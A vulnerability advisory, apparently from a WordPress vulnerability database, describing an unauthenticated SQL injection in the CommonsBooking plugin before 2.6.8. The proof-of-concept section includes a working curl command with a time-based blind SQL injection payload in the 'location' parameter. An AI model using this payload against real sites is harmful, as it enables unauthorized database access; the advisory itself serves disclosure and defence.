WordPress Plugin Vulnerabilities
CommonsBooking < 2.6.8 - Unauthenticated SQL Injection
Description
The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection
Proof of Concept
Create an "item" and a "location" via the newly added commonsbooking admin menu Take note of the item id and location id as they may be required for the exploit to work reliably Invoke the following curl command to trigger a 5 second sleep (via "location" parameter): curl http://127.0.0.1:8080/wp-admin/admin-ajax.php --data 'action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT 1743 FROM (SELECT(SLEEP(5)))iXxL3)' Note: + "sd" and "ed" are dates which should be in the future. + "item" should correspond to the item id you created previously (other values may work) + "location" is the injection point.
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-21 (about 2 years ago)
Added
2022-02-21 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)